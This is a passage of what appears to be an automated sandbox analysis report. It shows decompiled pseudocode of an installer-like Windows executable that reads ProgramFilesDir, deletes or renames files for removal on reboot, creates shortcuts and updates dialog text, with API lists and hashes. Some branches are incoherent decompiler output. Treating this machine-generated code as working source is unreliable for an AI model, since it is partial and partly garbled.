          									if(_t373 != _t390[0x13]) {
          										goto L80;
          									}
          									goto L42;
          									L52:
          									__eflags = _t383 - _t390[0x19];
          								} while (_t383 < _t390[0x19]);
          								_t218 = _t390[0x1b];
          								_t371 = _t390[0x17];
          								goto L54;
          							} else {
          								L00212B4E(_t382);
          								goto L57;
          							}
          						}
          						_t333 = _t328 >> 1;
          						_t390[0x19] = _t333;
          						goto L33;
          					} else {
          						goto L5;
          					}
          					do {
          						L5:
          						E00203393(_t387, _t370, _t380);
          						E00203393(_t387 + 0x14, _t370, _t380);
          						_t380 = _t380 + 1;
          						_t399 = _t380 -  *0x22d5f4; // 0x63
          					} while (_t399 < 0);
          					_t316 = 0;
          					goto L7;
          				}
          			}


          APIs
          • __EH_prolog.LIBCMT ref: 001FCFD9
          • _wcschr.LIBVCRUNTIME ref: 001FCFFA
          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001FD015
          • __fprintf_l.LIBCMT ref: 001FD4FB
            • Part of subcall function 00200FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001FB312,00000000,?,?,?,000F004A), ref: 00200FFA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
          • String ID: $ ,$$%s:$(&"$*messages***$*messages***$8&"$@%s:$@."$H&"$R$RTL$T&"$a
          • API String ID: 4184910265-3247519970
          • Opcode ID: 006115a27f1720f57b35d758d194082fba1fe72da7da74a0769336fe60dde4e2
          • Instruction ID: d4ea251b75978c6823f8c9af539dcb23f4a2e1f6b0becaaec9b3c6c1af89c4d4
          • Opcode Fuzzy Hash: 006115a27f1720f57b35d758d194082fba1fe72da7da74a0769336fe60dde4e2
          • Instruction Fuzzy Hash: 5212DEB160030DABDB24EFA4EC85AFD37AAFF54304F50016AFA0997291EB71D995CB50
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 49%
          			E0020B4C7(void* __edx) {
          				intOrPtr _t215;
          				void* _t220;
          				intOrPtr _t278;
          				void* _t291;
          				WCHAR* _t293;
          				void* _t296;
          				WCHAR* _t297;
          				void* _t302;
          
          				_t291 = __edx;
          				E0020D870(E0022150B, _t302);
          				_t215 = 0x1bc80;
          				E0020D940();
          				if( *((intOrPtr*)(_t302 + 0xc)) == 0) {
          					L169:
          					 *[fs:0x0] =  *((intOrPtr*)(_t302 - 0xc));
          					return _t215;
          				}
          				_push(0x1000);
          				_push(_t302 - 0xe);
          				_push(_t302 - 0xd);
          				_push(_t302 - 0x5c84);
          				_push(_t302 - 0xfc8c);
          				_push( *((intOrPtr*)(_t302 + 0xc)));
          				_t215 = E0020A156();
          				 *((intOrPtr*)(_t302 + 0xc)) = 0x1bc80;
          				if(0x1bc80 != 0) {
          					_t278 =  *((intOrPtr*)(_t302 + 0x10));
          					do {
          						_t220 = _t302 - 0x5c84;
          						_t296 = _t302 - 0x1bc8c;
          						_t293 = 6;
          						goto L4;
          						L6:
          						while(E00201410(_t302 - 0xfc8c,  *((intOrPtr*)(0x22d618 + _t297 * 4))) != 0) {
          							_t297 =  &(_t297[0]);
          							if(_t297 < 0xe) {
          								continue;
          							} else {
          								goto L167;
          							}
          						}
          						if(_t297 > 0xd) {
          							goto L167;
          						}
          						switch( *((intOrPtr*)(_t297 * 4 +  &M0020C0D7))) {
          							case 0:
          								__eflags = _t278 - 2;
          								if(_t278 != 2) {
          									goto L167;
          								}
          								_t299 = 0x800;
          								E002095F8(_t302 - 0x7c84, 0x800);
          								E001FA188(E001FB625(_t302 - 0x7c84, _t302 - 0x5c84, _t302 - 0xdc8c, 0x800), _t278, _t302 - 0x8c8c, 0x800);
          								 *(_t302 - 4) = _t293;
          								E001FA2C2(_t302 - 0x8c8c, _t302 - 0xdc8c);
          								E001F6EF9(_t302 - 0x3c84);
          								_push(_t293);
          								_t286 = _t302 - 0x8c8c;
          								_t238 = E001FA215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
          								__eflags = _t238;
          								if(_t238 == 0) {
          									L28:
          									 *(_t302 - 4) =  *(_t302 - 4) | 0xffffffff;
          									E001FA19E(_t302 - 0x8c8c);
          									goto L167;
          								} else {
          									goto L15;
          									L16:
          									E001FB1B7(_t286, __eflags, _t302 - 0x7c84, _t302 - 0x103c, _t299);
          									E001FAEA5(__eflags, _t302 - 0x103c, _t299);
          									_t301 = E00212B33(_t302 - 0x7c84);
          									__eflags = _t301 - 4;
          									if(_t301 < 4) {
          										L18:
          										_t266 = E001FB5E5(_t302 - 0x5c84);
          										__eflags = _t266;
          										if(_t266 != 0) {
          											goto L28;
          										}
          										L19:
          										_t268 = E00212B33(_t302 - 0x3c84);
          										__eflags = 0;
          										 *((short*)(_t302 + _t268 * 2 - 0x3c82)) = 0;
          										E0020E920(_t293, _t302 - 0x3c, _t293, 0x1e);
          										_t304 = _t304 + 0x10;
          										 *((intOrPtr*)(_t302 - 0x38)) = 3;
          										_push(0x14);
          										_pop(_t271);
          										 *((short*)(_t302 - 0x2c)) = _t271;
          										 *((intOrPtr*)(_t302 - 0x34)) = _t302 - 0x3c84;
          										_push(_t302 - 0x3c);
          										 *0x22def4();
          										goto L20;
          									}
          									_t276 = E00212B33(_t302 - 0x103c);
          									__eflags = _t301 - _t276;
          									if(_t301 > _t276) {
          										goto L19;
          									}
          									goto L18;
          									L20:
          									_t243 = GetFileAttributesW(_t302 - 0x3c84);
          									__eflags = _t243 - 0xffffffff;
          									if(_t243 == 0xffffffff) {
          										L27:
          										_push(_t293);
          										_t286 = _t302 - 0x8c8c;
          										_t245 = E001FA215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
          										__eflags = _t245;
          										if(_t245 != 0) {
          											_t299 = 0x800;
          											L15:
          											SetFileAttributesW(_t302 - 0x3c84, _t293);
          											__eflags =  *((char*)(_t302 - 0x2c78));
          											if(__eflags == 0) {
          												goto L20;
          											}
          											goto L16;
          										}
          										goto L28;
          									}
          									_t247 = DeleteFileW(_t302 - 0x3c84);
          									__eflags = _t247;
          									if(_t247 != 0) {
          										goto L27;
          									} else {
          										_t300 = _t293;
          										_push(_t293);
          										goto L24;
          										L24:
          										E001F3E41(_t302 - 0x103c, 0x800, L"%s.%d.tmp", _t302 - 0x3c84);
          										_t304 = _t304 + 0x14;
          										_t252 = GetFileAttributesW(_t302 - 0x103c);
          										__eflags = _t252 - 0xffffffff;
          										if(_t252 != 0xffffffff) {
          											_t300 = _t300 + 1;
          											__eflags = _t300;
          											_push(_t300);
          											goto L24;
          										} else {
          											_t255 = MoveFileW(_t302 - 0x3c84, _t302 - 0x103c);
          											__eflags = _t255;
          											if(_t255 != 0) {
          												MoveFileExW(_t302 - 0x103c, _t293, 4);
          											}
          											goto L27;
          										}
          									}
          								}
          							case 1:
          								__eflags = __ebx;
          								if(__ebx == 0) {
          									__eax = E00212B33(__esi);
          									__eax = __eax + __edi;
          									_push(__eax);
          									_push( *0x24ce0c);
          									__eax = E00212B5E(__ecx, __edx);
          									__esp = __esp + 0xc;
          									__eflags = __eax;
          									if(__eax != 0) {
          										 *0x24ce0c = __eax;
          										__eflags = __bl;
          										if(__bl != 0) {
          											__ecx = 0;
          											__eflags = 0;
          											 *__eax = __cx;
          										}
          										__eax = E002166ED(__eax, __esi);
          										_pop(__ecx);
          										_pop(__ecx);
          									}
          									__eflags = __bh;
          									if(__bh == 0) {
          										__eax = L00212B4E(__esi);
          									}
          								}
          								goto L167;
          							case 2:
          								__eflags = __ebx;
          								if(__ebx == 0) {
          									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
          								}
          								goto L167;
          							case 3:
          								__eflags = __ebx;
          								if(__ebx != 0) {
          									goto L167;
          								}
          								__eflags =  *0x239602 - __di;
          								if( *0x239602 != __di) {
          									goto L167;
          								}
          								__eax = 0;
          								__edi = __ebp - 0x5c84;
          								_push(0x22);
          								 *(__ebp - 0x103c) = __ax;
          								_pop(__eax);
          								__eflags =  *(__ebp - 0x5c84) - __ax;
          								if( *(__ebp - 0x5c84) == __ax) {
          									__edi = __ebp - 0x5c82;
          								}
          								__eax = E00212B33(__edi);
          								__esi = 0x800;
          								__eflags = __eax - 0x800;
          								if(__eax >= 0x800) {
          									goto L167;
          								} else {
          									__eax =  *__edi & 0x0000ffff;
          									_push(0x5c);
          									_pop(__ecx);
          									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
          									if(( *__edi & 0x0000ffff) != 0x2e) {
          										L54:
          										__eflags = __ax - __cx;
          										if(__ax == __cx) {
          											L66:
          											__ebp - 0x103c = E001FFAB1(__ebp - 0x103c, __edi, __esi);
          											__ebx = 0;
          											__eflags = 0;
          											L67:
          											_push(0x22);
          											_pop(__eax);
          											__eax = __ebp - 0x103c;
          											__eax = E00210D9B(__ebp - 0x103c, __ebp - 0x103c);
          											_pop(__ecx);
          											_pop(__ecx);
          											__eflags = __eax;
          											if(__eax != 0) {
          												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
          												if( *((intOrPtr*)(__eax + 2)) == __bx) {
          													__ecx = 0;
          													__eflags = 0;
          													 *__eax = __cx;
          												}
          											}
          											__eax = __ebp - 0x103c;
          											__edi = 0x239602;
          											E001FFAB1(0x239602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
          											__eax = E00209FFC(__ebp - 0x103c, __esi);
          											__esi = GetDlgItem( *(__ebp + 8), 0x66);
          											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
          											__ebx =  *0x22df7c;
          											__eax = SendMessageW(__esi, 0x143, __ebx, 0x239602); // executed
          											__eax = __ebp - 0x103c;
          											__eax = E00212B69(__ebp - 0x103c, 0x239602, __eax);
          											_pop(__ecx);
          											_pop(__ecx);
          											__eflags = __eax;
          											if(__eax != 0) {
          												__ebp - 0x103c = 0;
          												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
          											}
          											goto L167;
          										}
          										__eflags = __ax;
          										if(__ax == 0) {
          											L57:
          											__eax = __ebp - 0x18;
          											__ebx = 0;
          											_push(__ebp - 0x18);
          											_push(1);
          											_push(0);
          											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
          											_push(0x80000002);
          											__eax =  *0x22dea8();
          											__eflags = __eax;
          											if(__eax == 0) {
          												__eax = __ebp - 0x14;
          												 *(__ebp - 0x14) = 0x1000;
          												_push(__ebp - 0x14);
          												__eax = __ebp - 0x103c;
          												_push(__ebp - 0x103c);
          												__eax = __ebp - 0x1c;
          												_push(__ebp - 0x1c);
          												_push(0);
          												_push(L"ProgramFilesDir");
          												_push( *(__ebp - 0x18));
          												__eax =  *0x22dea4();
          												_push( *(__ebp - 0x18));
          												 *0x22de84() =  *(__ebp - 0x14);
          												__ecx = 0x7ff;
          												__eax =  *(__ebp - 0x14) >> 1;
          												__eflags = __eax - 0x7ff;
          												if(__eax >= 0x7ff) {
          													__eax = 0x7ff;
          												}
          												__ecx = 0;
          												__eflags = 0;
          												 *(__ebp + __eax * 2 - 0x103c) = __cx;
          											}
          											__eflags =  *(__ebp - 0x103c) - __bx;
          											if( *(__ebp - 0x103c) != __bx) {
          												__eax = __ebp - 0x103c;
          												__eax = E00212B33(__ebp - 0x103c);
          												_push(0x5c);
          												_pop(__ecx);
          												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
          												if(__eflags != 0) {
          													__ebp - 0x103c = E001FFA89(__eflags, __ebp - 0x103c, "\\", __esi);
          												}
          											}
          											__esi = E00212B33(__edi);
          											__eax = __ebp - 0x103c;
          											__eflags = __esi - 0x7ff;
          											__esi = 0x800;
          											if(__eflags < 0) {
          												__ebp - 0x103c = E001FFA89(__eflags, __ebp - 0x103c, __edi, 0x800);
          											}
          											goto L67;
          										}
          										__eflags =  *((short*)(__edi + 2)) - 0x3a;
          										if( *((short*)(__edi + 2)) == 0x3a) {
          											goto L66;
          										}
          										goto L57;
          									}
          									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
          									if( *((intOrPtr*)(__edi + 2)) != __cx) {
          										goto L54;
          									}
          									__edi = __edi + 4;
          									__ebx = 0;
          									__eflags =  *__edi - __bx;
          									if( *__edi == __bx) {
          										goto L167;
          									} else {
          										__ebp - 0x103c = E001FFAB1(__ebp - 0x103c, __edi, 0x800);
          										goto L67;
          									}
          								}
          							case 4:
          								__eflags =  *0x2395fc - 1;
          								__eflags = __eax - 0x2395fc;
          								 *__edi =  *__edi + __ecx;
          								__eflags =  *(__ebx + 6) & __bl;
          								 *__eax =  *__eax + __al;
          								__eflags =  *__eax;
          							case 5:
          								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
          								__ecx = 0;
          								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
          								__eflags = __eax;
          								if(__eax == 0) {
          									L84:
          									 *0x2375d2 = __cl;
          									 *0x2375d3 = 1;
          									goto L167;
          								}
          								__eax = __eax - 0x30;
          								__eflags = __eax;
          								if(__eax == 0) {
          									 *0x2375d2 = __cl;
          									L83:
          									 *0x2375d3 = __cl;
          									goto L167;
          								}
          								__eax = __eax - 1;
          								__eflags = __eax;
          								if(__eax == 0) {
          									goto L84;
          								}
          								__eax = __eax - 1;
          								__eflags = __eax;
          								if(__eax != 0) {
          									goto L167;
          								}
          								 *0x2375d2 = 1;
          								goto L83;
          							case 6:
          								__eflags = __ebx - 4;
          								if(__ebx != 4) {
          									goto L94;
          								}
          								__eax = __ebp - 0x5c84;
          								__eax = E00212B69(__ebp - 0x5c84, __eax, L"<>");
          								_pop(__ecx);
          								_pop(__ecx);
          								__eflags = __eax;
          								if(__eax == 0) {
          									goto L94;
          								}
          								_push(__edi);
          								goto L93;
          							case 7:
          								__eflags = __ebx - 1;
          								if(__eflags != 0) {
          									L115:
          									__eflags = __ebx - 7;
          									if(__ebx == 7) {
          										__eflags =  *0x2395fc;
          										if( *0x2395fc == 0) {
          											 *0x2395fc = 2;
          										}
          										 *0x2385f8 = 1;
          									}
          									goto L167;
          								}
          								__eax = __ebp - 0x7c84;
          								__edi = 0x800;
          								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
          								E001FAEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
          								__esi = 0;
          								_push(0);
          								while(1) {
          									_push( *0x22d5f8);
          									__ebp - 0x7c84 = E001F3E41(0x2385fa, __edi, L"%s%s%u", __ebp - 0x7c84);
          									__eax = E001F9E6B(0x2385fa);
          									__eflags = __al;
          									if(__al == 0) {
          										break;
          									}
          									__esi =  &(__esi->i);
          									__eflags = __esi;
          									_push(__esi);
          								}
          								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x2385fa);
          								__eflags =  *(__ebp - 0x5c84);
          								if( *(__ebp - 0x5c84) == 0) {
          									goto L167;
          								}
          								__eflags =  *0x245d02;
          								if( *0x245d02 != 0) {
          									goto L167;
          								}
          								__eax = 0;
          								 *(__ebp - 0x143c) = __ax;
          								__eax = __ebp - 0x5c84;
          								_push(0x2c);
          								_push(__ebp - 0x5c84);
          								__eax = E00210BB8(__ecx);
          								_pop(__ecx);
          								_pop(__ecx);
          								__eflags = __eax;
          								if(__eax != 0) {
          									L111:
          									__eflags =  *(__ebp - 0x143c);
          									if( *(__ebp - 0x143c) == 0) {
          										__ebp - 0x1bc8c = __ebp - 0x5c84;
          										E001FFAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
          										__ebp - 0x143c = E001FFAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
          									}
          									__ebp - 0x5c84 = E00209C4F(__ebp - 0x5c84);
          									__eax = 0;
          									 *(__ebp - 0x4c84) = __ax;
          									__ebp - 0x143c = __ebp - 0x5c84;
          									__eax = E00209735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
          									__eflags = __eax - 6;
          									if(__eax == 6) {
          										goto L167;
          									} else {
          										__eax = 0;
          										__eflags = 0;
          										 *0x2375d7 = 1;
          										 *0x2385fa = __ax;
          										__eax = EndDialog( *(__ebp + 8), 1);
          										goto L115;
          									}
          								}
          								__edx = 0;
          								__esi = 0;
          								__eflags =  *(__ebp - 0x5c84) - __dx;
          								if( *(__ebp - 0x5c84) == __dx) {
          									goto L111;
          								}
          								__ecx = 0;
          								__eax = __ebp - 0x5c84;
          								while(1) {
          									__eflags =  *__eax - 0x40;
          									if( *__eax == 0x40) {
          										break;
          									}
          									__esi =  &(__esi->i);
          									__eax = __ebp - 0x5c84;
          									__ecx = __esi + __esi;
          									__eax = __ebp - 0x5c84 + __ecx;
          									__eflags =  *__eax - __dx;
          									if( *__eax != __dx) {
          										continue;
          									}
          									goto L111;
          								}
          								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
          								__ebp - 0x143c = E001FFAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
          								__eax = 0;
          								__eflags = 0;
          								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
          								goto L111;
          							case 8:
          								__eflags = __ebx - 3;
          								if(__ebx == 3) {
          									__eflags =  *(__ebp - 0x5c84) - __di;
          									if(__eflags != 0) {
          										__eax = __ebp - 0x5c84;
          										_push(__ebp - 0x5c84);
          										__eax = E0021668C(__ebx, __edi);
          										_pop(__ecx);
          										 *0x24de1c = __eax;
          									}
          									__eax = __ebp + 0xc;
          									_push(__ebp + 0xc);
          									 *0x24de18 = E0020A2AE(__ecx, __edx, __eflags);
          								}
          								 *0x245d03 = 1;
          								goto L167;
          							case 9:
          								__eflags = __ebx - 5;
          								if(__ebx != 5) {
          									L94:
          									 *0x24de20 = 1;
          									goto L167;
          								}
          								_push(1);
          								L93:
          								__eax = __ebp - 0x5c84;
          								_push(__ebp - 0x5c84);
          								_push( *(__ebp + 8));
          								__eax = E0020C431();
          								goto L94;
          							case 0xa:
          								__eflags = __ebx - 6;
          								if(__ebx != 6) {
          									goto L167;
          								}
          								__eax = 0;
          								 *(__ebp - 0x2c3c) = __ax;
          								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
          								__eax = E002159C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
          								_push(0x800);
          								__eflags = __eax - 0x50;
          								if(__eax == 0x50) {
          									_push(0x24ad0a);
          									__eax = __ebp - 0x2c3c;
          									_push(__ebp - 0x2c3c);
          									__eax = E001FFAB1();
          									 *(__ebp - 0x14) = 2;
          								} else {
          									__eflags = __eax - 0x54;
          									__eax = __ebp - 0x2c3c;
          									if(__eflags == 0) {
          										_push(0x249d0a);
          										_push(__eax);
          										__eax = E001FFAB1();
          										 *(__ebp - 0x14) = 7;
          									} else {
          										_push(0x24bd0a);
          										_push(__eax);
          										__eax = E001FFAB1();
          										 *(__ebp - 0x14) = 0x10;
          									}
          								}
          								__eax = 0;
          								 *(__ebp - 0x9c8c) = __ax;
          								 *(__ebp - 0x1c3c) = __ax;
          								__ebp - 0x19c8c = __ebp - 0x6c84;
          								__eax = E00214D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
          								_pop(__ecx);
          								_pop(__ecx);
          								_push(0x22);
          								_pop(__ebx);
          								__eflags =  *(__ebp - 0x6c84) - __bx;
          								if( *(__ebp - 0x6c84) != __bx) {
          									__ebp - 0x6c84 = E001F9E6B(__ebp - 0x6c84);
          									__eflags = __al;
          									if(__al != 0) {
          										goto L152;
          									}
          									__ebx = __edi;
          									__esi = __ebp - 0x6c84;
          									__eflags =  *(__ebp - 0x6c84) - __bx;
          									if( *(__ebp - 0x6c84) == __bx) {
          										goto L152;
          									}
          									_push(0x20);
          									_pop(__ecx);
          									do {
          										__eax = __esi->i & 0x0000ffff;
          										__eflags = __ax - __cx;
          										if(__ax == __cx) {
          											L140:
          											__edi = __eax;
          											__eax = 0;
          											__esi->i = __ax;
          											__ebp - 0x6c84 = E001F9E6B(__ebp - 0x6c84);
          											__eflags = __al;
          											if(__al == 0) {
          												__esi->i = __di;
          												L148:
          												_push(0x20);
          												_pop(__ecx);
          												__edi = 0;
          												__eflags = 0;
          												goto L149;
          											}
          											_push(0x2f);
          											_pop(__eax);
          											__ebx = __esi;
          											__eflags = __di - __ax;
          											if(__di != __ax) {
          												_push(0x20);
          												_pop(__eax);
          												do {
          													__esi =  &(__esi->i);
          													__eflags = __esi->i - __ax;
          												} while (__esi->i == __ax);
          												_push(__esi);
          												__eax = __ebp - 0x1c3c;
          												L146:
          												_push(__eax);
          												__eax = E00214D7E();
          												_pop(__ecx);
          												_pop(__ecx);
          												 *__ebx = __di;
          												goto L148;
          											}
          											 *(__ebp - 0x1c3c) = __ax;
          											__eax =  &(__esi->i);
          											_push( &(__esi->i));
          											__eax = __ebp - 0x1c3a;
          											goto L146;
          										}
          										_push(0x2f);
          										_pop(__edx);
          										__eflags = __ax - __dx;
          										if(__ax != __dx) {
          											goto L149;
          										}
          										goto L140;
          										L149:
          										__esi =  &(__esi->i);
          										__eflags = __esi->i - __di;
          									} while (__esi->i != __di);
          									__eflags = __ebx;
          									if(__ebx != 0) {
          										__eax = 0;
          										__eflags = 0;
          										 *__ebx = __ax;
          									}
          									goto L152;
          								} else {
          									__ebp - 0x19c8a = __ebp - 0x6c84;
          									E00214D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
          									_push(__ebx);
          									_push(__ebp - 0x6c82);
          									__eax = E00210BB8(__ecx);
          									__esp = __esp + 0x10;
          									__eflags = __eax;
          									if(__eax != 0) {
          										__ecx = 0;
          										 *__eax = __cx;
          										__ebp - 0x1c3c = E00214D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
          										_pop(__ecx);
          										_pop(__ecx);
          									}
          									L152:
          									__eflags =  *(__ebp - 0x11c8c);
          									__ebx = 0x800;
          									if( *(__ebp - 0x11c8c) != 0) {
          										_push(0x800);
          										__eax = __ebp - 0x9c8c;
          										_push(__ebp - 0x9c8c);
          										__eax = __ebp - 0x11c8c;
          										_push(__ebp - 0x11c8c);
          										__eax = E001FAED7();
          									}
          									_push(__ebx);
          									__eax = __ebp - 0xbc8c;
          									_push(__ebp - 0xbc8c);
          									__eax = __ebp - 0x6c84;
          									_push(__ebp - 0x6c84);
          									__eax = E001FAED7();
          									__eflags =  *(__ebp - 0x2c3c);
          									if(__eflags == 0) {
          										__ebp - 0x2c3c = E0020A24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
          									}
          									__ebp - 0x2c3c = E001FAEA5(__eflags, __ebp - 0x2c3c, __ebx);
          									__eflags =  *((short*)(__ebp - 0x17c8c));
          									if(__eflags != 0) {
          										__ebp - 0x17c8c = __ebp - 0x2c3c;
          										E001FFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
          										__eax = E001FAEA5(__eflags, __ebp - 0x2c3c, __ebx);
          									}
          									__ebp - 0x2c3c = __ebp - 0xcc8c;
          									__eax = E00214D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
          									__eflags =  *(__ebp - 0x13c8c);
          									__eax = __ebp - 0x13c8c;
          									_pop(__ecx);
          									_pop(__ecx);
          									if(__eflags == 0) {
          										__eax = __ebp - 0x19c8c;
          									}
          									__ebp - 0x2c3c = E001FFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
          									__eax = __ebp - 0x2c3c;
          									__eflags = E001FB153(__ebp - 0x2c3c);
          									if(__eflags == 0) {
          										L162:
          										__ebp - 0x2c3c = E001FFA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
          										goto L163;
          									} else {
          										__eflags = __eax;
          										if(__eflags == 0) {
          											L163:
          											_push(1);
          											__eax = __ebp - 0x2c3c;
          											_push(__ebp - 0x2c3c);
          											E001F9D3A(__ecx, __ebp) = __ebp - 0xbc8c;
          											__ebp - 0xac8c = E00214D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
          											_pop(__ecx);
          											_pop(__ecx);
          											__ebp - 0xac8c = E001FB98D(__eflags, __ebp - 0xac8c);
          											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
          											__eax = __ebp - 0x1c3c;
          											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
          											__edx = __ebp - 0x9c8c;
          											__esi = __ebp - 0xac8c;
          											asm("sbb ecx, ecx");
          											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
          											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
          											asm("sbb eax, eax");
          											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
          											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
          											__eax = __ebp - 0x15c8c;
          											asm("sbb edx, edx");
          											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
          											E00209D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
          											__ebp - 0xbc8c = E00209450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
          											__eflags =  *(__ebp - 0xcc8c);
          											if( *(__ebp - 0xcc8c) != 0) {
          												_push(__edi);
          												__eax = __ebp - 0xcc8c;
          												_push(__ebp - 0xcc8c);
          												_push(5);
          												_push(0x1000);
          												__eax =  *0x22def8();
          											}
          											goto L167;
          										}
          										goto L162;
          									}
          								}
          							case 0xb:
          								__eflags = __ebx - 7;
          								if(__ebx == 7) {
          									 *0x239600 = 1;
          								}
          								goto L167;
          							case 0xc:
          								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
          								__eax = E002159C0( *(__ebp - 0x5c84) & 0x0000ffff);
          								__eflags = __eax - 0x46;
          								if(__eax == 0x46) {
          									 *0x2375d4 = 1;
          								} else {
          									__eflags = __eax - 0x55;
          									if(__eax == 0x55) {
          										 *0x2375d5 = 1;
          									} else {
          										__eax = 0;
          										 *0x2375d4 = __al;
          										 *0x2375d5 = __al;
          									}
          								}
          								goto L167;
          							case 0xd:
          								 *0x24de21 = 1;
          								__eax = __eax + 0x24de21;
          								_t112 = __esi + 0x39;
          								 *_t112 =  *(__esi + 0x39) + __esp;
          								__eflags =  *_t112;
          								__ebp = 0xffffa37c;
          								if( *_t112 != 0) {
          									_t114 = __ebp - 0x5c84; // 0xffff46f8
          									__eax = _t114;
          									_push(_t114);
          									 *0x22d5fc = E002013FC();
          								}
          								goto L167;
          						}
          						L4:
          						_t220 = E00209E24(_t220, _t296);
          						_t296 = _t296 + 0x2000;
          						_t293 = _t293 - 1;
          						if(_t293 != 0) {
          							goto L4;
          						} else {
          							_t297 = _t293;
          							goto L6;
          						}
          						L167:
          						_push(0x1000);
          						_t205 = _t302 - 0xe; // 0xffffa36e
          						_t206 = _t302 - 0xd; // 0xffffa36f
          						_t207 = _t302 - 0x5c84; // 0xffff46f8
          						_t208 = _t302 - 0xfc8c; // 0xfffea6f0
          						_push( *((intOrPtr*)(_t302 + 0xc)));
          						_t215 = E0020A156();
          						_t278 =  *((intOrPtr*)(_t302 + 0x10));
          						 *((intOrPtr*)(_t302 + 0xc)) = _t215;
          					} while (_t215 != 0);
          				}
          			}












          APIs
          • __EH_prolog.LIBCMT ref: 0020B4CC
            • Part of subcall function 0020A156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0020A21E
          • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0020ADDF,?,00000000), ref: 0020B601
          • GetFileAttributesW.KERNEL32(?), ref: 0020B6BB
          • DeleteFileW.KERNEL32(?), ref: 0020B6C9
          • SetWindowTextW.USER32(?,?), ref: 0020B812
          • _wcsrchr.LIBVCRUNTIME ref: 0020B99C
          • GetDlgItem.USER32(?,00000066), ref: 0020B9D7
          • SetWindowTextW.USER32(00000000,?), ref: 0020B9E7
          • SendMessageW.USER32(00000000,00000143,00000000,00239602), ref: 0020B9FB
          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0020BA24
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
          • API String ID: 3676479488-312220925
